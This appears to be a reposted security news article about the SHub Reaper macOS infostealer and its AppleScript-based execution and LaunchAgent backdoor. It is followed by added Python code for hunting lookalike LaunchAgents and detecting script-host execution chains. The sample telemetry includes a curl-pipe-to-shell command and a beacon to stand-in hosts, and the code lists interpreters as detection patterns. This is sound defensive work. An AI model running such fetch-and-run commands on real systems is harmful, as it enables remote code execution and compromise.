LmCast :: Stay tuned in

Stealer Spoofs Google, Microsoft & Apple, Then Backdoors macOS

Recorded: May 19, 2026, 8 p.m.

Original

The SHub Reaper stealer, which hides behind fake WeChat and Miro installers, marks a shift from ClickFix social engineering to AppleScript-based execution.

By Elizabeth Montalbano, Contributing Writer, Dark Reading. May 19, 2026. 4 min read.

A newly identified macOS infostealer combines the capabilities of stealer and backdoor malware, and delivers itself through a multistage social engineering campaign that impersonates Apple, Google, and Microsoft in turn. The stealer, SHub Reaper, is a variant of the broader Shub malware family and demonstrates a new pattern in macOS malware behavior.

SHub Reaper uses fake WeChat and Miro installers as lures to get users to download it, according to SentinelOne, which published details of the variant in a report on Monday. Hiding behind fake application downloads is a common way for attackers to distribute infostealing malware.

"The malware infection starts with malicious Web pages offering Miro and WeChat installers, and they aggressively look for browsers with extensions relating to crypto wallets and popular password managers," Phil Stokes, macOS and AI research engineer at SentinelOne, tells Dark Reading via email.

What makes SHub Reaper's impersonation unusual is how the infection chain changes its disguise at each stage of the attack, he says. The payload may be hosted on a typosquatted Microsoft domain, executed under the guise of an Apple security update, and persist from a fake Google Software Update directory. That "multibrand spoofing across a single chain" is "unusual," Stokes tells Dark Reading.

SHub Reaper: A Two-for-One Malware

SHub Reaper also flips traditional stealer behavior on its head by combining typical stealer features, such as credential theft, wallet hijacking, and document exfiltration, with persistent backdoor access, a capability that stealers usually lack, Stokes noted. The malware does this by installing a fake Google Update framework under the user's Library paths and registering a LaunchAgent that uses Google Keystone-style naming conventions. The beacon checks in every 60 seconds and supports arbitrary command execution, effectively turning an infostealer infection into a lightweight macOS backdoor, he observed.

"The backdoor adds yet another vector for theft and compromise," Stokes tells Dark Reading. "Earlier families of infostealers were notably smash-and-grab, and didn't even bother with persistence." SHub Reaper, on the other hand, "is a multifunctional malware that blends tradecraft from a number of recent families," he explains.

A Paradigm-Changing Cyber Execution Chain

The malware also represents a shift in how macOS stealers execute on a victim's machine, according to SentinelOne. Instead of relying on standard "ClickFix" social engineering, in which victims are tricked into pasting a command into Terminal, "the variant uses a delivery mechanism that bypasses Terminal entirely and sidesteps Apple's Tahoe 26.4 mitigation for those attack flows," Stokes wrote.

He is referring to the protections Apple recently introduced in macOS Tahoe 26.4 to blunt Terminal-driven social engineering attacks such as ClickFix. SHub Reaper sidesteps those mitigations by moving execution into trusted Apple-native scripting workflows: it uses the applescript:// URL scheme to open macOS Script Editor with a malicious AppleScript already loaded, so the victim never has to paste anything into Terminal.

This shift away from social engineering that requires victims to paste commands into Terminal marks "a noteworthy evolution in macOS infostealers," Jason Soroko, senior fellow at certificate life cycle management firm Sectigo, tells Dark Reading via email. "Attackers are instead exploiting the applescript:// URL scheme to automatically load the macOS Script Editor with malicious payloads, effectively circumventing" the new macOS mitigations, he says.

The reason for the shift is that attackers can now "confine execution to running system processes or user-initiated processes like Script Editor or the Terminal," Stokes explained in the post. "This allows the attacker to execute without introducing foreign binaries to the file system, and makes it easier to bypass file scanning detection tools like Apple's own XProtect and similar third-party tools."

New Cyberattack Behaviors Call for New Defense

Infostealers are one of the quickest ways for attackers to compromise enterprise credentials, which can then be used for further malicious activity. Research from WhiteIntel published in March found that it takes attackers only 48 hours to move stolen credentials from an infected laptop to an underground marketplace, which may be one reason their use is steadily rising, according to the 2025 M-Trends report from Google's Mandiant.

For macOS users, recognizing the social engineering tactics SHub Reaper uses is the easiest way to prevent infection, according to SentinelOne. In particular, users should note how the infection chain layers familiar brands and trusted software cues across multiple stages, Stokes noted in the report.

For enterprise defenders, SHub Reaper's move from ClickFix to AppleScript and other living-off-the-land (LotL) techniques for execution creates a new detection surface and renders the terminal-centric detections written for earlier infections largely ineffective. Instead, SentinelOne recommends that security teams monitor their environments for the following to detect SHub Reaper infections: unexpected invocation of Script Editor (Script Editor.app); osascript spawning curl or shell interpreters; browser-to-AppleScript execution chains; and user-driven AppleScript execution originating from unusual URL handlers.

Summarized

A newly identified macOS infostealer, dubbed SHub Reaper, is a variant of the broader Shub malware family and represents a significant evolution in stealer behavior: it combines traditional stealer functionality with persistent backdoor access and a layered social engineering chain. The infection begins with malicious web pages offering fake installers for applications such as WeChat and Miro, a common lure, and the malware then hunts for browser extensions tied to cryptocurrency wallets and password managers. Each stage of the chain wears a different disguise: the payload may be hosted on a typosquatted Microsoft domain, run under the guise of an Apple security update, and persist from a fake Google Software Update directory. Phil Stokes, a macOS and AI research engineer at SentinelOne, called this "multibrand spoofing across a single chain" unusual.

SHub Reaper distinctly flips conventional stealer behavior by integrating features such as credential theft, wallet hijacking, and document exfiltration alongside persistent backdoor capabilities, which are typically absent in standard infostealers. To establish persistence, the malware installs a fake Google Update framework within the user Library paths and registers a LaunchAgent utilizing Google Keystone-style naming conventions. This backdoor maintains command and control by checking in every sixty seconds and enabling arbitrary command execution, thus transforming the infection from a simple infostealer into a lightweight macOS backdoor.
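The persistence mechanism described above, a LaunchAgent with Keystone-style naming that beacons every 60 seconds, is something a defender can hunt for across a fleet. The following is an added example, not SentinelOne's code or indicators: it parses LaunchAgent plists and flags any agent whose Google-style label does not match where the genuine Google updater keeps its binary, whose program is a script interpreter, whose arguments invoke a script or downloader, or whose StartInterval looks like a beacon cadence rather than an updater cadence. The plists are constructed samples, the genuine Keystone directory is an assumption about the real updater's layout, and the checks generalise beyond this malware to any agent that borrows a vendor's naming.

```python
"""Hunt LaunchAgents for persistence that borrows Google Keystone naming.

Added example, not SentinelOne's code or indicators. The plists below are
constructed for the demo. Where the genuine Google updater keeps its binary
(under ~/Library/Google/GoogleSoftwareUpdate/) is an assumption about the real
layout; `codesign -v` on the program path is the authoritative follow-up check.
"""
from __future__ import annotations
import plistlib
import re
from pathlib import Path

GENUINE_KEYSTONE_DIR = "/Library/Google/GoogleSoftwareUpdate/"   # assumption about the real layout
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "python", "perl", "curl"}
SHORT_INTERVAL = 300      # seconds; a 60 s check-in is a beacon cadence, not an updater cadence
SCRIPT_ARG = re.compile(r"\b(curl|osascript)\b|\.(sh|scpt|applescript)\b")


def agent_argv(plist: dict) -> list[str]:
    """launchd accepts either Program or ProgramArguments; normalise to one argv."""
    argv = list(plist.get("ProgramArguments") or [])
    if plist.get("Program"):
        argv = [plist["Program"]] + argv[1:]
    return argv


def analyze(plist: dict) -> list[str]:
    """Return the reasons an agent looks suspicious (empty list means clean)."""
    reasons: list[str] = []
    label = str(plist.get("Label", "")).lower()
    argv = agent_argv(plist)
    if not argv:
        return reasons
    exe = Path(argv[0]).name
    if label.startswith("com.google.") and GENUINE_KEYSTONE_DIR not in argv[0]:
        reasons.append(f"Google-style label {label!r} but program {argv[0]!r} is outside the Keystone directory")
    if exe in INTERPRETERS:
        reasons.append(f"program is an interpreter ({exe}) rather than an app binary")
    for arg in argv[1:]:
        if SCRIPT_ARG.search(arg):
            reasons.append(f"argument invokes a script or downloader: {arg!r}")
            break
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval <= SHORT_INTERVAL:
        reasons.append(f"StartInterval {interval}s is beacon-like")
    return reasons


def scan_plists(plists: dict[str, bytes]) -> dict[str, list[str]]:
    """Return {filename: reasons} for every agent that trips at least one check."""
    hits: dict[str, list[str]] = {}
    for name, data in plists.items():
        reasons = analyze(plistlib.loads(data))
        if reasons:
            hits[name] = reasons
    return hits


def scan_dir(directory: Path = Path.home() / "Library" / "LaunchAgents") -> dict[str, list[str]]:
    """Run the checks over a real LaunchAgents directory."""
    return scan_plists({p.name: p.read_bytes() for p in directory.glob("*.plist")})


# Constructed samples: one modelled on a genuine Keystone agent, one lookalike, one unrelated agent.
SAMPLE = {
    "com.google.keystone.agent.plist": plistlib.dumps({
        "Label": "com.google.keystone.agent",
        "ProgramArguments": ["/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent",
                             "-runMode", "ifneeded"],
        "StartInterval": 3523, "RunAtLoad": True}),
    "com.google.keystone.update.plist": plistlib.dumps({           # constructed lookalike
        "Label": "com.google.keystone.update",
        "ProgramArguments": ["/bin/sh", "-c", "/Users/alice/Library/Application Support/GoogleUpdate/agent.sh"],
        "StartInterval": 60, "RunAtLoad": True}),
    "homebrew.mxcl.redis.plist": plistlib.dumps({
        "Label": "homebrew.mxcl.redis",
        "ProgramArguments": ["/opt/homebrew/opt/redis/bin/redis-server", "/opt/homebrew/etc/redis.conf"],
        "KeepAlive": True, "RunAtLoad": True}),
}

if __name__ == "__main__":
    for name, reasons in scan_plists(SAMPLE).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

Only the lookalike trips the checks; the genuine-looking agent and the Homebrew service pass. On a live host, follow any hit with `codesign -v` on the program path and with a look at the LaunchAgent's creation time, since a fresh Keystone-named agent appearing alongside a new "GoogleUpdate" directory under ~/Library is the shape of persistence the article describes.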

The malware demonstrates a paradigm shift in execution methods by moving away from conventional ClickFix social engineering, in which users are tricked into pasting commands into Terminal, to abusing native macOS scripting workflows. The mitigation Apple added in macOS Tahoe 26.4 targets exactly those Terminal-driven flows; SHub Reaper sidesteps it by using the applescript:// URL scheme, which opens Script Editor with a malicious AppleScript already loaded, so that no command is ever pasted into Terminal. Jason Soroko, a senior fellow at Sectigo, described this as a noteworthy evolution in macOS infostealers. As Stokes explained, confining execution to running system processes or user-initiated processes such as Script Editor or Terminal lets the attacker run without introducing foreign binaries to the file system, which in turn helps evade file-scanning tools such as Apple's XProtect.

This evolution in execution creates a new detection surface for enterprise defenders and renders terminal-centric detections written for ClickFix-style infections largely ineffective. SentinelOne therefore recommends monitoring for specific behaviors: unexpected invocations of Script Editor (Script Editor.app), osascript spawning shell interpreters or curl, browser-to-AppleScript execution chains, and user-driven AppleScript execution originating from unusual URL handlers. Speed matters because infostealers are one of the fastest routes to compromised enterprise credentials; WhiteIntel's research found that stolen credentials can reach an underground marketplace within 48 hours of infection. For macOS users, recognizing the layered use of familiar brand cues across the infection chain is the most practical prevention; for organizations, monitoring for these Script Editor and scripting behaviors is essential.
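The four monitoring recommendations above map directly onto rules over process telemetry. The following is an added example, not SentinelOne's detection content: it runs those rules over a constructed, simplified event stream (the field names and the body of the applescript:// URL are assumptions), correlating an applescript:// hand-off from a browser with a Script Editor launch, and walking parent chains to catch Script Editor or osascript spawning shells or curl. It goes slightly beyond the article by also catching Script Editor as the spawning host, since a script run inside Script Editor executes `do shell script` from that process rather than from osascript.

```python
"""Rule-based detection for the AppleScript execution chains SentinelOne lists.

Added example, not SentinelOne's detection content. EVENTS is a constructed,
simplified stand-in for EDR telemetry: one dict per process exec or URL-open.
Field names and the applescript:// URL contents are assumptions.
"""
from __future__ import annotations
from urllib.parse import urlsplit

BROWSERS = {"Safari", "Google Chrome", "firefox", "Microsoft Edge", "Arc", "Brave Browser"}
SCRIPT_HOSTS = {"Script Editor", "osascript"}
SUSPICIOUS_CHILDREN = {"curl", "sh", "bash", "zsh", "python3", "perl"}
CORRELATION_WINDOW = 10.0   # seconds between an applescript:// hand-off and the Script Editor exec

# Constructed sample telemetry: a benign Terminal session, a benign https hand-off,
# a browser -> Script Editor -> sh -> curl chain, and a LaunchAgent-style osascript beacon.
EVENTS = [
    {"t": 10.0, "type": "exec", "pid": 300, "ppid": 1, "name": "Terminal",
     "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"t": 10.5, "type": "exec", "pid": 301, "ppid": 300, "name": "zsh", "cmdline": "-zsh"},
    {"t": 12.0, "type": "exec", "pid": 302, "ppid": 301, "name": "curl", "cmdline": "curl -sS https://example.com/"},
    {"t": 40.0, "type": "url_open", "app": "Safari", "url": "https://example.com/download"},
    {"t": 100.0, "type": "url_open", "app": "Safari",
     "url": "applescript://com.apple.scripteditor?action=new&script=display%20dialog%20%22hi%22"},
    {"t": 101.2, "type": "exec", "pid": 500, "ppid": 1, "name": "Script Editor",
     "cmdline": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    {"t": 104.0, "type": "exec", "pid": 501, "ppid": 500, "name": "sh",
     "cmdline": "sh -c curl -fsSL https://update.example.invalid/a | sh"},
    {"t": 104.1, "type": "exec", "pid": 502, "ppid": 501, "name": "curl",
     "cmdline": "curl -fsSL https://update.example.invalid/a"},
    {"t": 160.0, "type": "exec", "pid": 600, "ppid": 1, "name": "osascript",
     "cmdline": "/usr/bin/osascript /Users/alice/Library/Application Support/GoogleUpdate/agent.scpt"},
    {"t": 160.3, "type": "exec", "pid": 601, "ppid": 600, "name": "sh",
     "cmdline": "sh -c curl -s https://c2.example.invalid/beacon"},
    {"t": 160.4, "type": "exec", "pid": 602, "ppid": 601, "name": "curl",
     "cmdline": "curl -s https://c2.example.invalid/beacon"},
]


def script_host_ancestor(event: dict, by_pid: dict[int, dict]) -> dict | None:
    """Walk the parent chain; return the first ancestor that is Script Editor or osascript."""
    seen: set[int] = set()
    ppid = event["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        parent = by_pid[ppid]
        if parent["name"] in SCRIPT_HOSTS:
            return parent
        ppid = parent["ppid"]
    return None


def detect(events: list[dict]) -> list[dict]:
    """Apply the four rules and return one alert dict per finding, in time order."""
    alerts: list[dict] = []
    by_pid = {e["pid"]: e for e in events if e["type"] == "exec"}
    last_handoff = None   # (t, app) of the latest applescript:// open from a browser

    for e in sorted(events, key=lambda x: x["t"]):
        if e["type"] == "url_open":
            # Rule 4: AppleScript execution driven from a URL handler.
            if urlsplit(e["url"]).scheme.lower() == "applescript":
                from_browser = e["app"] in BROWSERS
                alerts.append({"rule": "applescript_url_handler",
                               "severity": "high" if from_browser else "medium",
                               "t": e["t"], "app": e["app"]})
                if from_browser:
                    last_handoff = (e["t"], e["app"])
            continue

        if e["name"] == "Script Editor":
            # Rules 1 and 3: Script Editor launched, and (if it follows a browser hand-off)
            # a browser-to-AppleScript chain. URL-scheme launches arrive via launchd, so the
            # parent pid is 1; correlating on time is what ties them back to the browser.
            if last_handoff and 0 <= e["t"] - last_handoff[0] <= CORRELATION_WINDOW:
                alerts.append({"rule": "browser_to_scripteditor", "severity": "high",
                               "pid": e["pid"], "via": last_handoff[1]})
            else:
                alerts.append({"rule": "scripteditor_launch", "severity": "low", "pid": e["pid"]})

        if e["name"] in SUSPICIOUS_CHILDREN:
            # Rule 2: osascript (or Script Editor) spawning curl or a shell.
            host = script_host_ancestor(e, by_pid)
            if host is not None:
                alerts.append({"rule": "script_host_spawns_interpreter", "severity": "high",
                               "pid": e["pid"], "host": host["name"], "child": e["name"],
                               "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The Terminal-driven curl never alerts, which is the point: the rules key on the scripting host in the ancestry rather than on Terminal. Real EDR telemetry usually carries a "responsible process" attribute for launches that go through LaunchServices; where that is available it is a more reliable link from the browser to Script Editor than the time window used here.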